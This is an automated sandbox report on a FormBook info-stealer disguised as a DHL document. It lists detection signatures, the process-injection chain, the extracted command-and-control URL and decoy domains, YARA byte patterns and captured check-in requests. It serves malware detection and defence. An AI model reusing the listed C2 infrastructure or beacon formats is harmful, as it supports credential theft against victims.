Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report DHL DOC 3406506482.exe

Overview

General Information

Sample Name:DHL DOC 3406506482.exe
Analysis ID:532855
MD5:896c3c7f309a479f0ab1a9d8693b130f
SHA1:9ad094b6799fb6deea1d2c3704576db3353d70ae
SHA256:6f35f7c071de6ed456c189e023daa27c5b0cd007d4fcddbb13316a82ada83abe
Tags:DHLexeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • DHL DOC 3406506482.exe (PID: 4824 cmdline: "C:\Users\user\Desktop\DHL DOC 3406506482.exe" MD5: 896C3C7F309A479F0AB1A9D8693B130F)
    • DHL DOC 3406506482.exe (PID: 3488 cmdline: C:\Users\user\Desktop\DHL DOC 3406506482.exe MD5: 896C3C7F309A479F0AB1A9D8693B130F)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 1004 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 4140 cmdline: /c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.verdugofarms.com/q35x/"], "decoy": ["86ffd.com", "riquelmetaylor.com", "web3media.xyz", "lesbian-kyonyu.net", "assurancestreet.com", "giftboxpromos.com", "3exnck.com", "androidgays.com", "eduexsoft.com", "bmtmarmall.com", "mstrevent.com", "suvyco.link", "urautloads.com", "peaacockrv.com", "stanefree.com", "ybcxzgnmu.com", "pittsburgh-pestcontrol-co.com", "thesecond-handrose.com", "otcovotakkia.quest", "josephinesart.com", "uenpb.xyz", "gzczjsfg.com", "emptybestliving.com", "thecripsarena.com", "1688bfb.com", "garymullin.com", "socialteers-millunu.com", "zapf-nachhilfe.com", "expressportaldeliveryline.com", "hobbydiscover.store", "qncqroup.com", "housepainteroshawa.com", "craftedbycharter.com", "sushibaraustin.com", "kjjsclosets.com", "leylaatakan.com", "luminbowstore.com", "autoauctioncenter.com", "bon-da.com", "spilledreviews.com", "hbtysj.com", "truthrevealedtv.com", "gmcanchorage.com", "kirbycarpet.com", "ambire.email", "awonky.com", "giannagragnani.com", "infomw-abogados.com", "summit-mulundwest.info", "omradesutveckling.com", "jennypennybeachboutique.com", "medicalmarijuana.quest", "tusjentagal.quest", "zghglw.com", "bmcq1.com", "counsellinggta.com", "econnect.club", "xn--42cgr3fjyvj4c9a.com", "wed8029.com", "jeweleryshowcase.com", "ketofam.com", "roiward.tech", "artemi.club", "maddocksmedia.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.DHL DOC 3406506482.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.DHL DOC 3406506482.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.DHL DOC 3406506482.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        1.0.DHL DOC 3406506482.exe.400000.6.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.0.DHL DOC 3406506482.exe.400000.6.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 17 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.verdugofarms.com/q35x/"], "decoy": ["86ffd.com", "riquelmetaylor.com", "web3media.xyz", "lesbian-kyonyu.net", "assurancestreet.com", "giftboxpromos.com", "3exnck.com", "androidgays.com", "eduexsoft.com", "bmtmarmall.com", "mstrevent.com", "suvyco.link", "urautloads.com", "peaacockrv.com", "stanefree.com", "ybcxzgnmu.com", "pittsburgh-pestcontrol-co.com", "thesecond-handrose.com", "otcovotakkia.quest", "josephinesart.com", "uenpb.xyz", "gzczjsfg.com", "emptybestliving.com", "thecripsarena.com", "1688bfb.com", "garymullin.com", "socialteers-millunu.com", "zapf-nachhilfe.com", "expressportaldeliveryline.com", "hobbydiscover.store", "qncqroup.com", "housepainteroshawa.com", "craftedbycharter.com", "sushibaraustin.com", "kjjsclosets.com", "leylaatakan.com", "luminbowstore.com", "autoauctioncenter.com", "bon-da.com", "spilledreviews.com", "hbtysj.com", "truthrevealedtv.com", "gmcanchorage.com", "kirbycarpet.com", "ambire.email", "awonky.com", "giannagragnani.com", "infomw-abogados.com", "summit-mulundwest.info", "omradesutveckling.com", "jennypennybeachboutique.com", "medicalmarijuana.quest", "tusjentagal.quest", "zghglw.com", "bmcq1.com", "counsellinggta.com", "econnect.club", "xn--42cgr3fjyvj4c9a.com", "wed8029.com", "jeweleryshowcase.com", "ketofam.com", "roiward.tech", "artemi.club", "maddocksmedia.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: DHL DOC 3406506482.exeVirustotal: Detection: 29%Perma Link
          Source: DHL DOC 3406506482.exeReversingLabs: Detection: 37%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 1.0.DHL DOC 3406506482.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.DHL DOC 3406506482.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.DHL DOC 3406506482.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.DHL DOC 3406506482.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: DHL DOC 3406506482.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: DHL DOC 3406506482.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: DHL DOC 3406506482.exe, 00000001.00000002.317544821.00000000033E0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DHL DOC 3406506482.exe, 00000001.00000002.316428940.000000000106F000.00000040.00000001.sdmp, DHL DOC 3406506482.exe, 00000001.00000002.316230194.0000000000F50000.00000040.00000001.sdmp, explorer.exe, 0000000E.00000002.514321960.00000000049E0000.00000040.00000001.sdmp, explorer.exe, 0000000E.00000002.514487240.0000000004AFF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DHL DOC 3406506482.exe, 00000001.00000002.316428940.000000000106F000.00000040.00000001.sdmp, DHL DOC 3406506482.exe, 00000001.00000002.316230194.0000000000F50000.00000040.00000001.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.514321960.00000000049E0000.00000040.00000001.sdmp, explorer.exe, 0000000E.00000002.514487240.0000000004AFF000.00000040.00000001.sdmp
          Source: Binary string: explorer.pdb source: DHL DOC 3406506482.exe, 00000001.00000002.317544821.00000000033E0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 1.32.255.152:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 1.32.255.152:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 1.32.255.152:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.uenpb.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 1.32.255.152 80
          Source: C:\Windows\explorer.exeDomain query: www.wed8029.com
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.uenpb.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.verdugofarms.com/q35x/
          Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
          Source: global trafficHTTP traffic detected: GET /q35x/?1bL4BX=n0W6sBJt6o5hFrgQrmHErIHHCJqVSMT16xl2hKdZI7rsj0AVnZwRK3Rm3lIsVsqUahNr&TBZ8=3fcPMN HTTP/1.1Host: www.uenpb.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Dec 2021 17:56:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: unknownDNS traffic detected: queries for: www.wed8029.com
          Source: global trafficHTTP traffic detected: GET /q35x/?1bL4BX=n0W6sBJt6o5hFrgQrmHErIHHCJqVSMT16xl2hKdZI7rsj0AVnZwRK3Rm3lIsVsqUahNr&TBZ8=3fcPMN HTTP/1.1Host: www.uenpb.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: DHL DOC 3406506482.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
